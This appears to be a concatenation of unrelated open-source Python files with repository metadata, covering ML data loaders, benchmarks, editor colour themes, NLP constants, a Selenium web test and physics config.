задач QTimer.singleShot(0, self.hide) if __name__ == '__main__': app = QApplication([]) mw = MainWindow() mw.resize(1200, 800) mw.show() mw.refresh() app.exec()
applications/popart/faster-rcnn/nanodata/dataset/xml_dataset_for_rcnn.py
payoto/graphcore_examples
260
30527
<reponame>payoto/graphcore_examples # Copyright (c) 2021 Graphcore Ltd. All rights reserved. # Copyright 2021 RangiLyu. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # This file has been modified by Graphcore Ltd. import numpy as np import torch from .xml_dataset import XMLDataset from utils import logger if logger.GLOBAL_LOGGER is not None: print = logger.GLOBAL_LOGGER.log_str def calc_area(boxes): # boxes: n,4 # return x1, y1, x2, y2 = np.split(boxes, 4, 1) areas = (y2 - y1) * (x2 - x1) # n,1 return areas[:, 0] class XMLDatasetForRcnn(XMLDataset): def __init__(self, preset_indices=None, area_filter_thrd=0.0, num_gtboxes=20, specified_length=None, extra_layer=None, **kwargs): self.area_filter_thrd = area_filter_thrd self.num_gtboxes = num_gtboxes self.preset_indices = preset_indices self._cur_for_preset_indices = 0 super(XMLDatasetForRcnn, self).__init__(**kwargs) self.real_length = len(self.data_info) self.length = self.real_length * 2 if specified_length is None else specified_length self.extra_layer = extra_layer def get_train_data(self, idx): """ Load image and annotation :param idx: :return: meta-data (a dict containing image, annotation and other information) filter zero area boxes """ if self.preset_indices is None: pass else: idx = self.preset_indices[self._cur_for_preset_indices] self._cur_for_preset_indices += 1 idx = int(idx % self.real_length) meta = super().get_train_data(idx) # filter boxes and labels by area areas = calc_area(meta['gt_bboxes']) mask = areas > self.area_filter_thrd meta['gt_bboxes'] = meta['gt_bboxes'][mask, :] meta['gt_labels'] = meta['gt_labels'][mask] meta['db_inds'] = idx # # pad boxes and inds boxes = np.zeros((self.num_gtboxes, 4)).astype(np.float32) num_boxes = meta['gt_bboxes'].shape[0] boxes[:num_boxes, :] = meta['gt_bboxes'][:self.num_gtboxes] meta['gt_bboxes'] = torch.from_numpy(boxes) labels = np.asarray([0] * self.num_gtboxes) labels[:num_boxes] = meta['gt_labels'][:self.num_gtboxes] meta['gt_labels'] = torch.from_numpy(labels) meta['num_boxes'] = num_boxes if num_boxes == 0: return None # return None will re-run this function # proc data in extra layer if self.extra_layer is not None: meta = self.extra_layer(meta) return meta def __len__(self): return self.length
spyder_terminal/widgets/style/themes.py
mrclary/spyder-terminal
169
30540
<filename>spyder_terminal/widgets/style/themes.py # -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # Copyright (c) Spyder Project Contributors # # Licensed under the terms of the MIT License # (see LICENSE.txt for details) # ----------------------------------------------------------------------------- ANSI_COLORS = { 'emacs': { 'black': '#000000', 'red': '#800000', 'green': '#005100', 'yellow': '#abab67', 'blue': '#151d51', 'magenta': '#510051', 'cyan': '#105151', 'white': '#ffffff', 'brightBlack': '#555555', 'brightRed': '#c80000', 'brightGreen': '#00aa00', 'brightYellow': '#cbcb7b', 'brightBlue': '#3c51e8', 'brightMagenta': '#900090', 'brightCyan': '#20a7a7', 'brightWhite': '#ffffff' }, 'idle': { 'black': '#ffffff', 'red': '#8a0000', 'green': '#008a00', 'yellow': '#8a4000', 'blue': '#00008a', 'magenta': '#5a005a', 'cyan': '#105151', 'white': '#ffffff', 'brightBlack': '#555555', 'brightRed': '#dd0000', 'brightGreen': '#00aa00', 'brightYellow': '#ff7700', 'brightBlue': '#0000ff', 'brightMagenta': '#900090', 'brightCyan': '#20a7a7', 'brightWhite': '#ffffff' }, 'monokai': { 'black': '#48483e', 'red': '#dc2566', 'green': '#8fc029', 'yellow': '#d4c96e', 'blue': '#55bcce', 'magenta': '#9358fe', 'cyan': '#56b7a5', 'white': '#f8f8f2', 'brightBlack': '#76715e', 'brightRed': '#fa2772', 'brightGreen': '#a7e22e', 'brightYellow': '#e7db75', 'brightBlue': '#66d9ee', 'brightMagenta': '#ae82ff', 'brightCyan': '#66efd5', 'brightWhite': '#f9f8f5' }, 'pydev': { 'black': '#ffffff', 'red': '#800000', 'green': '#00aa00', 'yellow': '#ffff99', 'blue': '#0000ff', 'magenta': '#900090', 'cyan': '#007f7f', 'white': '#efefef', 'brightBlack': '#c0c0c0', 'brightRed': '#c10000', 'brightGreen': '#00cc00', 'brightYellow': '#fff569', 'brightBlue': '#015aff', 'brightMagenta': '#bf00bf', 'brightCyan': '#00a5a5', 'brightWhite': '#ffffff' }, 'scintilla': { 'black': '#ffffff', 'red': '#800000', 'green': '#007f00', 'yellow': '#ffff99', 'blue': '#00007f', 'magenta': '#7f007f', 'cyan': '#007f7f', 'white': '#efefef', 'brightBlack': '#adadad', 'brightRed': '#c10000', 'brightGreen': '#00ab00', 'brightYellow': '#fff569', 'brightBlue': '#0000ff', 'brightMagenta': '#be00be', 'brightCyan': '#00a5a5', 'brightWhite': '#ffffff' }, 'spyder': { 'black': '#ffffff', 'red': '#800000', 'green': '#00aa00', 'yellow': '#ffff99', 'blue': '#0000ff', 'magenta': '#900090', 'cyan': '#27b5ac', 'white': '#efefef', 'brightBlack': '#adadad', 'brightRed': '#c10000', 'brightGreen': '#00c800', 'brightYellow': '#fff569', 'brightBlue': '#0a37ff', 'brightMagenta': '#d500d5', 'brightCyan': '#2dd0c5', 'brightWhite': '#ffffff' }, 'spyder/dark': { 'black': '#19232D', 'red': '#c80000', 'green': '#11a642', 'yellow': '#c5bb29', 'blue': '#558eff', 'magenta': '#aa00aa', 'cyan': '#20b3a7', 'white': '#ffffff', 'brightBlack': '#4b4b4b', 'brightRed': '#ef0000', 'brightGreen': '#13c24b', 'brightYellow': '#e6e13f', 'brightBlue': '#4395ff', 'brightMagenta': '#da00da', 'brightCyan': '#23cbbd', 'brightWhite': '#ffffff' }, 'zenburn': { 'black': '#3F3F3F', 'red': '#705050', 'green': '#60B48A', 'yellow': '#DFAF8F', 'blue': '#506070', 'magenta': '#DC8CC3', 'cyan': '#8CD0D3', 'white': '#DCDCCC', 'brightBlack': '#709080', 'brightRed': '#DCA3A3', 'brightGreen': '#C3BF9F', 'brightYellow': '#F0DFAF', 'brightBlue': '#94BFF3', 'brightMagenta': '#EC93D3', 'brightCyan': '#93E0E3', 'brightWhite': '#DCDCCC' }, 'solarized/light': { 'black': '#fdf6e3', 'red': '#dc322f', 'green': '#859900', 'yellow': '#b58900', 'blue': '#268bd2', 'magenta': '#6c71c4', 'cyan': '#2aa198', 'white': '#93a1a1', 'brightBlack': '#657b83', 'brightRed': '#dc322f', 'brightGreen': '#859900', 'brightYellow': '#b58900', 'brightBlue': '#268bd2', 'brightMagenta': '#6c71c4', 'brightCyan': '#2aa198', 'brightWhite': '#fdf6e3' }, 'solarized/dark': { 'black': '#002b36', 'red': '#dc322f', 'green': '#859900', 'yellow': '#b58900', 'blue': '#268bd2', 'magenta': '#6c71c4', 'cyan': '#2aa198', 'white': '#93a1a1', 'brightBlack': '#657b83', 'brightRed': '#dc322f', 'brightGreen': '#859900', 'brightYellow': '#b58900', 'brightBlue': '#268bd2', 'brightMagenta': '#6c71c4', 'brightCyan': '#2aa198', 'brightWhite': '#fdf6e3' }, 'inkpot': { 'black': '#1f1f27', 'red': '#CD5200', 'green': '#9DCD00', 'yellow': '#cd8b00', 'blue': '#87cefa', 'magenta': '#8b8bff', 'cyan': '#87FAE5', 'white': '#93a1a1', 'brightBlack': '#313131', 'brightRed': '#CD2300', 'brightGreen': '#C0CD00', 'brightYellow': '#ffcd8b', 'brightBlue': '#B9E1FA', 'brightMagenta': '#A3A3FF', 'brightCyan': '#B8FAEE', 'brightWhite': '#cfbfad' }, 'minimal': { 'black': '#ffffff', 'red': '#D22D72', 'green': '#568C3B', 'yellow': '#8A8A0F', 'blue': '#257FAD', 'magenta': '#5D5DB1', 'cyan': '#2D8F6F', 'white': '#7EA2B4', 'brightBlack': '#5A7B8C', 'brightRed': '#D22D72', 'brightGreen': '#568C3B', 'brightYellow': '#8A8A0F', 'brightBlue': '#257FAD', 'brightMagenta': '#5D5DB1', 'brightCyan': '#2D8F6F', 'brightWhite': '#EBF8FF' }, 'nightlion': { 'black': '#4c4c4c', 'red': '#bb0000', 'green': '#5fde8f', 'yellow': '#f3f167', 'blue': '#276bd8', 'magenta': '#bb00bb', 'cyan': '#00dadf', 'white': '#bbbbbb', 'brightBlack': '#555555', 'brightRed': '#ff5555', 'brightGreen': '#55ff55', 'brightYellow': '#ffff55', 'brightBlue': '#5555ff', 'brightMagenta': '#ff55ff', 'brightCyan': '#55ffff', 'brightWhite': '#ffffff' }, 'notepad++': { 'black': '#ffffff', 'red': '#CC342B', 'green': '#198844', 'yellow': '#FBA922', 'blue': '#3971ED', 'magenta': '#A36AC7', 'cyan': '#3971ED', 'white': '#C5C8C6', 'brightBlack': '#969896', 'brightRed': '#CC342B', 'brightGreen': '#198844', 'brightYellow': '#FBA922', 'brightBlue': '#3971ED', 'brightMagenta': '#A36AC7', 'brightCyan': '#3971ED', 'brightWhite': '#FFFFFF' }, 'oblivion': { 'black': '#1D1F21', 'red': '#CC6666', 'green': '#B5BD68', 'yellow': '#F0C674', 'blue': '#81A2BE', 'magenta': '#B294BB', 'cyan': '#8ABEB7', 'white': '#C5C8C6', 'brightBlack': '#969896', 'brightRed': '#CC6666', 'brightGreen': '#B5BD68', 'brightYellow': '#F0C674', 'brightBlue': '#81A2BE', 'brightMagenta': '#B294BB', 'brightCyan': '#8ABEB7', 'brightWhite': '#FFFFFF' }, 'obsidian': { 'black': '#232C31', 'red': '#2A5491', 'green': '#237986', 'yellow': '#A03B1E', 'blue': '#484D79', 'magenta': '#C59820', 'cyan': '#B02F30', 'white': '#9EA7A6', 'brightBlack': '#3F4944', 'brightRed': '#2A5491', 'brightGreen': '#237986', 'brightYellow': '#A03B1E', 'brightBlue': '#484D79', 'brightMagenta': '#C59820', 'brightCyan': '#B02F30', 'brightWhite': '#B5D8F6' }, 'pastel': { 'black': '#000000', 'red': '#c37372', 'green': '#72c373', 'yellow': '#c2c372', 'blue': '#7372c3', 'magenta': '#c372c2', 'cyan': '#72c2c3', 'white': '#d9d9d9', 'brightBlack': '#323232', 'brightRed': '#dbaaaa', 'brightGreen': '#aadbaa', 'brightYellow': '#dadbaa', 'brightBlue': '#aaaadb', 'brightMagenta': '#dbaada', 'brightCyan': '#aadadb', 'brightWhite': '#ffffff' }, 'retta': { 'black': '#000000', 'red': '#A54242', 'green': '#8C9440', 'yellow': '#de935f', 'blue': '#5F819D', 'magenta': '#85678F', 'cyan': '#5E8D87', 'white': '#969896', 'brightBlack': '#373b41', 'brightRed': '#cc6666', 'brightGreen': '#b5bd68', 'brightYellow': '#f0c674', 'brightBlue': '#81a2be', 'brightMagenta': '#b294bb', 'brightCyan': '#8abeb7', 'brightWhite': '#c5c8c6' }, 'roboticket': { 'black': '#f5f5f5', 'red': '#E64569', 'green': '#89D287', 'yellow': '#DAB752', 'blue': '#439ECF', 'magenta': '#D961DC', 'cyan': '#64AAAF', 'white': '#B3B3B3', 'brightBlack': '#535353', 'brightRed': '#E4859A', 'brightGreen': '#A2CCA1', 'brightYellow': '#E1E387', 'brightBlue': '#6FBBE2', 'brightMagenta': '#E586E7', 'brightCyan': '#96DCDA', 'brightWhite': '#DEDEDE' }, 'sublime-monokai/extended': { 'black': '#222222', 'red': '#dc2566', 'green': '#8fc029', 'yellow': '#d4c96e', 'blue': '#55bcce', 'magenta': '#9358fe', 'cyan': '#56b7a5', 'white': '#f8f8f2', 'brightBlack': '#76715e', 'brightRed': '#fa2772', 'brightGreen': '#a7e22e', 'brightYellow': '#e7db75', 'brightBlue': '#66d9ee', 'brightMagenta': '#ae82ff', 'brightCyan': '#66efd5', 'brightWhite': '#f9f8f5' }, 'vibrant-ink': { 'black': '#191919', 'red': '#d00e18', 'green': '#138034', 'yellow': '#ffcb3e', 'blue': '#006bb3', 'magenta': '#6b2775', 'cyan': '#384564', 'white': '#ededed', 'brightBlack': '#5d504a', 'brightRed': '#f07e18', 'brightGreen': '#b1d130', 'brightYellow': '#fff120', 'brightBlue': '#4fc2fd', 'brightMagenta': '#de0071', 'brightCyan': '#5d504a', 'brightWhite': '#ffffff' } }
erniekit/common/rule.py
PaddlePaddle/LARK
1,552
30553
<filename>erniekit/common/rule.py # -*- coding: utf-8 -* """ some rule """ class MaxTruncation(object): """MaxTruncation:超长截断规则 """ KEEP_HEAD = 0 # 从头开始到最大长度截断 KEEP_TAIL = 1 # 从头开始到max_len-1的位置截断,末尾补上最后一个id(词或字) KEEP_BOTH_HEAD_TAIL = 2 # 保留头和尾两个位置,然后按keep_head方式截断 class EmbeddingType(object): """EmbeddingType:文本数据需要转换的embedding类型:no_emb , ernie_emb """ NONE_EMBEDDING = 0 # 不需要emb ERNIE_EMBEDDING = 1 # 用ernie生成emb FLUID_EMBEDDING = 2 # 使用fluid的op生成emb class FluidDataType(object): """ FluidDataType data struct wrapper """ def __init__(self, shape, dtype, lod_level, name=None): self.shape = shape self.dtype = dtype self.lod_level = lod_level self.name = name class WordPieceType(object): """字词混合切分模式下,每个token的type""" SINGLE_TOKEN = 0 # 单个字 WORD_START = 1 # 词首字符 WORD_INCLUDE = 2 # 词中间字符 class DataShape(object): """DataShape:输入的数据类型 """ STRING = "string" # string INT = "int" # int64 FLOAT = "float" # float32 class InstanceName(object): """InstanceName:一些常用的命名 """ RECORD_ID = "id" RECORD_EMB = "emb" SRC_IDS = "src_ids" WORDSEG_IDS = "wordseg_ids" MASK_IDS = "mask_ids" LOSS_MASK = "loss_mask" SEQ_LENS = "seq_lens" SENTENCE_IDS = "sent_ids" POS_IDS = "pos_ids" TASK_IDS = "task_ids" PHONETIC_A_IDS = "phonetic_a_ids" PHONETIC_B_IDS = "phonetic_b_ids" GLYPH_A_IDS = "glyph_a_ids" GLYPH_B_IDS = "glyph_b_ids" GLYPH_C_IDS = "glyph_c_ids" GLYPH_D_IDS = "glyph_d_ids" REL_POS_IDS="rel_pos_ids" DEEP_IDS = "deep_ids" BEG_IDS = "beg_ids" END_IDS = "end_ids" #生成训练相关key TGT_LABEL = "tgt_label" TGT_POS = "tgt_pos" #生成解码相关key TGT_SRC_IDS = "tgt_src_ids" TGT_POS_IDS = "tgt_pos_ids" INIT_SCORES = "init_scores" PARENT_IDX = "parent_idx" TGT_MASK_IDS = 'tgt_mask_ids' DATA_IDS = 'data_ids' #多轮对话相关key ROLE_IDS = "role_ids" TURN_IDS = "turn_ids" TGT_PHONETIC_A_IDS = "tgt_phonetic_a_ids" TGT_PHONETIC_B_IDS = "tgt_phonetic_b_ids" TGT_GLYPH_A_IDS = "tgt_glyph_a_ids" TGT_GLYPH_B_IDS = "tgt_glyph_b_ids" TGT_GLYPH_C_IDS = "tgt_glyph_c_ids" TGT_GLYPH_D_IDS = "tgt_glyph_d_ids" # seq2seq的label域相关key TRAIN_LABEL_SRC_IDS = "train_label_src_ids" TRAIN_LABEL_MASK_IDS = "train_label_mask_ids" TRAIN_LABEL_SEQ_LENS = "train_label_seq_lens" INFER_LABEL_SRC_IDS = "infer_label_src_ids" INFER_LABEL_MASK_IDS = "infer_label_mask_ids" INFER_LABEL_SEQ_LENS = "infer_label_seq_lens" # term rank 相关的key TERM_POS = "term_pos" TERM_TOKENS_NUMS = "term_tokens_nums" TERM_INDEX = "term_index" TERM_PAIRS = "term_pairs" TERM_DIFFS = "term_diffs" SEQUENCE_EMB = "sequence_output" # 词级别的embedding POOLED_EMB = "pooled_output" # 句子级别的embedding TARGET_FEED = "target_feed" # 保存模型时需要的入参:表示模型预测时需要输入的变量,tensor 或者variable类型 TARGET_FEED_NAMES = "target_feed_name" # 保存模型时需要的入参:表示模型预测时需要输入的变量名称和顺序 TARGET_PREDICTS = "target_predicts" # 保存模型时需要的入参:表示预测时最终输出的结果 PREDICT_RESULT = "predict_result" # 训练过程中需要传递的预测结果 STUDENT_PREDICT_RESULT = "student_predict_result" # 训练过程中需要传递的预测结果 TEACHER_PREDICT_RESULT = "teacher_predict_result" # 训练过程中需要传递的预测结果 LABEL = "label" # label TEACHER_CE_LOSS = "teacher_ce_loss" STUDENT_CE_LOSS = "student_ce_loss" DISTILL_LOSS = "distill_loss" PRED_LOSS = "pred_loss" LOSS = "loss" # loss # CRF_EMISSION = "crf_emission" # crf_emission TRAINING = "training" # 训练过程 EVALUATE = "evaluate" # 评估过程 TEST = "test" # 测试过程 SAVE_INFERENCE = "save_inference" # 保存inference model的过程 INFERENCE = "inference" # 预测过程 STEP = "steps" SPEED = "speed" TIME_COST = "time_cost" GPU_ID = "gpu_id" FILE_CHECKPOINTS = "checkpoints" FILE_INFERENCE_MODEL = "inference_model" TYPE_PY_READER = "py_reader" TYPE_DATA_LOADER = "data_loader" # ERNIE-VIL相关key IMAGE_PIXEL_IDS = "image_pixel_ids" IMAGE_POSITION = "image_position" IMAGE_TAG_IDS = "image_tag_ids" TEXT_INDEX = "text_index" IMAGE_INDEX = "image_index" POS_INDEX = "pos_index" # ERNIE-Layout相关key POS_2D_IDS = "pos_2d_ids" SEGMENT_IDS = "segment_ids" # DynaBERT相关key HIDDEN_LAYERS = "hidden_layers" LOGIT = "logit" # prompt相关key LABEL_MAP_IDS = "label_map_ids" LABEL_TEXT_IDS = "label_text_ids" BATCH_SIZE = "batch_size" MAX_SEQ_LEN = "max_seq_len" class FieldLength(object): """一个field在序列化成field_id_list的时候,占的长度是多少 """ CUSTOM_TEXT_FIELD = 3 ERNIE_TEXT_FIELD = 6 SINGLE_SCALAR_FIELD = 1 ARRAY_SCALAR_FIELD = 2 BASIC_TEXT_FIELD = 2 GENERATE_LABEL_FIELD = 6 ERNIE_TERM_RANK_TEXT_FIELD = 9 ERNIT_TERM_RANK_LABEL_FIELD = 4 # ERNIE-VIL RELATED VARIABLES ERNIEVIL_IMAGE_PIXEL_FIELD = 1 ERNIEVIL_IMAGE_TAGS_FIELD = 1 # ERNIE-Layout RELATED VARIABLES ERNIE_LAYOUT_SEQLABEL_FIELD = 10 class FleetMode(object): """Fleet模式 """ NO_FLEET = "NO_FLEET" CPU_MODE = "CPU" GPU_MODE = "GPU" class UploadModelType(object): """模型上传的类型""" UPLOAD_HDFS_IMMEDIATE = "immediate" # 实时上传到HDFS UPLOAD_HDFS_LAST_TIME = "last_time" # 训练结束之后由paddlecloud平台进行集中上传 class StoreModelType(object): """模型保存方式的类型""" STORE_HDFS = "hadoop" # 保存到hadoop集群上 STORE_IREPO = "irepo" # 保存到irepo模型仓库中 class EncryptType(object): """模型加密的方式""" ENCRYPT_NONE = None # 不加密 ENCRYPT_MEMORY = "memory" # 内存加密 ENCRYPT_FILE = "file" # 文件加密 class InferenceRetcode(object): """ 预测服务返回码 """ RET_OK = 200 LOAD_JSON_FAILED = 201 MISSING_FIELD = 202 class GraphMode(object): """图模式 """ #动态图 DYGRAPH = "dynamic" #静态图 STATIC = "static"
scripts/selenium/test.py
Mlrobinson1993/trustroots
377
30557
#!/usr/bin/env python from browsers import browsers from selenium import webdriver from selenium.webdriver.common.keys import Keys from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from selenium.webdriver.support.wait import WebDriverWait from selenium.common.exceptions import TimeoutException import time import sys import re import signal print 'Trustroots Selenium tests' # URL is passed as an argument if len(sys.argv) > 1: test_url = sys.argv[1] # Default to localhost else: test_url = 'http://localhost:3000/' print 'Testing URL: ' + test_url class Main: def __init__(self): try: from config_browserstack import browserstack_url no_browserstack = 0 except ImportError: no_browserstack = 1 no_browserstack = 1 for cap in browsers: if cap['env'] == 'remote' and no_browserstack: if no_browserstack == 1: print 'sorry, no browserstack' no_browserstack = 2 # Should be cleaner else: if cap['env'] == 'local': driver = getattr(webdriver, cap['browser'])() else: print 'launching', cap driver = webdriver.Remote( command_executor=browserstack_url, desired_capabilities=cap ) try: self.t = TestSuite(driver, cap, test_url) except: print sys.exc_info() finally: if cap['env'] == 'remote': driver.quit() class TestSuite: def __init__(self, driver, cap, url): self.wait = WebDriverWait(driver, 15) self.driver = driver self.cap = cap self.url = url def signal_handler(signal, frame): print('Handling Ctrl+C!') if hasattr(self, 'driver') and self.driver: print 'Trying driver.quit()' self.driver.quit() sys.exit(0) signal.signal(signal.SIGINT, signal_handler) try: self.run_tests() except: print cap print sys.exc_info() def run_tests(self): self.username = 'tester' + str(time.time())[5:10] self.email = self.username + '@example.tld' self.password = '<PASSWORD>' self.driver.get(self.url) self.test_signup() self.test_home_map() self.test_logout_signin() self.test_logout_signin_email() def test_signup(self): if not "Trustroots" in self.driver.title: raise Exception("Unable to load page!") self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-signup') if not 'Trustroots' in self.driver.title: raise Exception("Unable to load page!") self._wait_and_click(self.driver.find_element_by_id, 'firstName') self.driver.find_element_by_id('firstName').send_keys('Tester') self.driver.find_element_by_id('lastName').send_keys('Tester') self.driver.find_element_by_id('username').send_keys(self.username) self.driver.find_element_by_id('email').send_keys(self.email) self.driver.find_element_by_id('password').send_keys(self.password) self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]') self._wait_and_click(self.driver.find_element_by_id, 'signup-edit') def test_logout_signin(self): self.driver.get(self.url + 'auth/signout') self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login') self.driver.find_element_by_id('username').send_keys(self.username) self.driver.find_element_by_id('password').send_keys(self.password) self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]') def test_logout_signin_email(self): self.driver.get(self.url + 'auth/signout') self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login') self.driver.find_element_by_id('username').send_keys(self.email) self.driver.find_element_by_id('password').send_keys(<PASSWORD>) self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]') def test_home_map(self): self._wait_and_click(self.driver.find_element_by_css_selector, 'a.navbar-brand') self.driver.find_element_by_id('search-query').send_keys('Berlin' + Keys.RETURN) def _assert_contains_regexp(self, regexp): text_found = re.search(regexp, self.driver.page_source) print text_found assert text_found != None def _wait_and_click_id(self, _id, pause=0): self._wait_and_click(self.driver.find_element_by_id, _id, pause) def _wait_and_click(self, func, param, pause=0): if pause == 0: self.wait.until(lambda _: func(param).is_displayed()) else: self._sleep(pause) func(param).click() m = Main()
demo/utils/genderdetect.py
TommyZihao/MMGEN-FaceStylor
122
30562
<reponame>TommyZihao/MMGEN-FaceStylor<gh_stars>100-1000 import random import cv2 padding = 20 MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746) genderList = ['Male', 'Female'] class GenderDetection(): def __init__(self): faceProto = 'data/opencv_face_detector.pbtxt' faceModel = 'data/opencv_face_detector_uint8.pb' genderProto = 'data/gender_deploy.prototxt' genderModel = 'data/gender_net.caffemodel' self.ans = [True, False] self.faceNet = cv2.dnn.readNet(faceModel, faceProto) self.genderNet = cv2.dnn.readNet(genderModel, genderProto) def highlightFace(self, net, frame, conf_threshold=0.9): frameOpencvDnn = frame.copy() frameHeight = frameOpencvDnn.shape[0] frameWidth = frameOpencvDnn.shape[1] blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], True, False) net.setInput(blob) detections = net.forward() faceBoxes = [] for i in range(detections.shape[2]): confidence = detections[0, 0, i, 2] if confidence > conf_threshold: x1 = int(detections[0, 0, i, 3] * frameWidth) y1 = int(detections[0, 0, i, 4] * frameHeight) x2 = int(detections[0, 0, i, 5] * frameWidth) y2 = int(detections[0, 0, i, 6] * frameHeight) faceBoxes.append([x1, y1, x2, y2]) cv2.rectangle(frameOpencvDnn, (x1, y1), (x2, y2), (0, 255, 0), int(round(frameHeight / 150)), 8) return frameOpencvDnn, faceBoxes # opencv def detect(self, img): try: resultImg, faceBoxes = self.highlightFace(self.faceNet, img) if not faceBoxes: return self.ans[random.randint(0, 1)] for faceBox in faceBoxes: if (max(faceBox) > 1024): continue face = img[max(0, faceBox[1] - padding):min(faceBox[3] + padding, img.shape[0] - 1), max(0, faceBox[0] - padding):min(faceBox[2] + padding, img.shape[1] - 1)] blob = cv2.dnn.blobFromImage(face, 1.0, (227, 227), MODEL_MEAN_VALUES, swapRB=False) self.genderNet.setInput(blob) genderPreds = self.genderNet.forward() gender = genderList[genderPreds[0].argmax()] if (gender == 'Female'): return True else: return False except: # isort:skip # noqa return self.ans[random.randint(0, 1)]
fclib/tests/test_dcnn.py
barrosm/forecasting
2,276
30566
<gh_stars>1000+ # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. from fclib.models.dilated_cnn import create_dcnn_model def test_create_dcnn_model(): mod0 = create_dcnn_model(seq_len=1) # default args assert mod0 is not None mod1 = create_dcnn_model( seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=1, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120] ) assert mod1 is not None mod2 = create_dcnn_model( seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=2, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120] ) assert mod2 is not None
Alignment/CommonAlignmentProducer/python/ALCARECOTkAlMinBias_Output_cff.py
ckamtsikis/cmssw
852
30605
<gh_stars>100-1000 import FWCore.ParameterSet.Config as cms # AlCaReco for track based alignment using MinBias events OutALCARECOTkAlMinBias_noDrop = cms.PSet( SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring('pathALCARECOTkAlMinBias') ), outputCommands = cms.untracked.vstring( 'keep *_ALCARECOTkAlMinBias_*_*', 'keep L1AcceptBunchCrossings_*_*_*', 'keep L1GlobalTriggerReadoutRecord_gtDigis_*_*', 'keep *_TriggerResults_*_*', 'keep DcsStatuss_scalersRawToDigi_*_*', 'keep *_offlinePrimaryVertices_*_*', 'keep *_offlineBeamSpot_*_*') ) import copy OutALCARECOTkAlMinBias = copy.deepcopy(OutALCARECOTkAlMinBias_noDrop) OutALCARECOTkAlMinBias.outputCommands.insert(0, "drop *")
benchmarks/roberta/benchmark_tft.py
legacyai/tf-transformers
116
30617
"""TFTBechmark scripts""" import shutil import tempfile import time import tensorflow as tf import tqdm from datasets import load_dataset from transformers import RobertaTokenizerFast from tf_transformers.models import Classification_Model from tf_transformers.models import RobertaModel as Model _ALLOWED_DECODER_TYPES = ["keras_model", "saved_model"] class TftBenchmark: def __init__(self, cfg): self.cfg = cfg # Check compatible model type self.model_type = cfg.benchmark.model.type if self.model_type not in _ALLOWED_DECODER_TYPES: raise ValueError("Unknow model type {} defined".format(self.model_type)) self.model_name = cfg.benchmark.model.name self.tokenizer = RobertaTokenizerFast.from_pretrained(self.model_name) self.temp_dir = tempfile.mkdtemp() def load_and_batch_dataset(self): """Load TF dataset""" cfg = self.cfg tokenizer = self.tokenizer # Load from hydra config dataset_name = cfg.benchmark.data.name take_sample = cfg.benchmark.data.take_sample batch_size = cfg.benchmark.data.batch_size max_length = cfg.benchmark.data.max_length dataset = load_dataset(dataset_name, split="test") if take_sample: dataset = dataset.select(range(50)) # Add summarize: with text self.dataset = dataset dataset = dataset.map( lambda e: tokenizer(e["text"], truncation=True, padding=True, max_length=max_length), batched=True, ) dataset.set_format(type="tensorflow", columns=["input_ids"]) features = { x: tf.cast(dataset[x], dtype=tf.int32).to_tensor(default_value=0, shape=[None, max_length]) for x in ["input_ids"] } features['input_mask'] = tf.ones_like(features['input_ids']) features['input_type_ids'] = tf.zeros_like(features['input_ids']) tfdataset = tf.data.Dataset.from_tensor_slices((features)).batch(batch_size) # Convert alldataset to a list for not including that latency while measuring model # performance # (batch_dataset, batch_size, seq_length) batched_datasets = [(batch_dataset, batch_dataset['input_ids'].shape[0]) for batch_dataset in tfdataset] return batched_datasets def _load_keras_model(self): """Load using TextDecoder KerasModel""" def classifier_fn(model): def _classifier_fn(inputs): return model(inputs) return _classifier_fn model_name = self.cfg.benchmark.model.name # Load Auto Regressive Version model = Model.from_pretrained(model_name=model_name) model = Classification_Model(model, num_classes=2) model = model.get_model() return classifier_fn(model) def _load_saved_model(self): """Load using TextDecoder saved_model""" def classifier_fn(): model = self.loaded.signatures['serving_default'] def _classifier_fn(inputs): return model(**inputs) return _classifier_fn model_name = self.cfg.benchmark.model.name model = Model.from_pretrained(model_name=model_name) model = Classification_Model(model, num_classes=2) model = model.get_model() # Save as saved_model model.save_serialized(self.temp_dir, overwrite=True) # Load as saved_model del model self.loaded = tf.saved_model.load(self.temp_dir) return classifier_fn() def load_model_classifier_fn(self): """Load Model""" if self.model_type == "keras_model": classifier_fn = self._load_keras_model() if self.model_type == "saved_model": classifier_fn = self._load_saved_model() return classifier_fn def run(self): #### Load Decoder function classifier_fn = self.load_model_classifier_fn() print("Decoder function loaded succesfully") #### Load dataset batched_datasets = self.load_and_batch_dataset() print("Dataset loaded succesfully") import gc gc.collect() #### Run classifier function # Sample batch (to avoid first time compilation time) sample_batch_inputs, _ = batched_datasets[0] outputs = classifier_fn(sample_batch_inputs) slines = 0 start_time = time.time() for (batch_inputs, batch_size) in tqdm.tqdm(batched_datasets, unit="batch "): outputs = classifier_fn(batch_inputs) # noqa slines += batch_size end_time = time.time() shutil.rmtree(self.temp_dir) time_taken = end_time - start_time samples_per_second = slines / time_taken return {"model_type": self.model_type, "time_taken": time_taken, "samples_per_second": samples_per_second}
test/functional/tests/initialize/test_clean_reboot.py
Ostrokrzew/open-cas-linux
139
30623
